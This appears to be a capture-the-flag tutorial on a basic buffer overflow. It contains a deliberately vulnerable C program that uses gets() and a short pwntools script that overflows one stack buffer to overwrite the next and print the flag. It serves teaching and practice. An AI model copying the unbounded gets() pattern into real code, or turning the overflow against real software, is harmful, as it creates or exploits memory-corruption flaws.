Basic Buffer Overflow #

Description #

There are a number of unsafe functions in C/C++ that allow you to write an arbitrary amount of data, overflowing the allocated buffer.

There are many of these dangerous functions, but some common ones include gets, memcpy, scanf, strcpy, and many more.

Using these dangerous functions we can clobber other variables on the stack.

In the following example we will exploit gets to overwrite the following buffer.

Example #

#include <stdio.h>
#include <string.h>
// gcc -g -o chal chal.c

int main() {
    char buffer1[16];
    char buffer2[16] = "xxxxxxxxxxxxxxx";

    gets(buffer1);

    if (strcmp(buffer2, "impossible?") == 0) {
        puts("flag{win}");
    } else {
        puts("nope");
    }
}

Solution #

Using the buffer overflow, we send input that writes past the allocated space for buffer1 to set the value of buffer2.

Since buffer2 is after buffer1 we first send 16 bytes to fill buffer1, and then write impossible? to buffer2 to get the flag.

Solve Script #

import pwn

p = pwn.process("./chal")

p.sendline(b"a"*16 + b"impossible?")
p.interactive()

Files #

• chal
• chal.c
• solve.py

Resources #

• Microsoft Banned Functions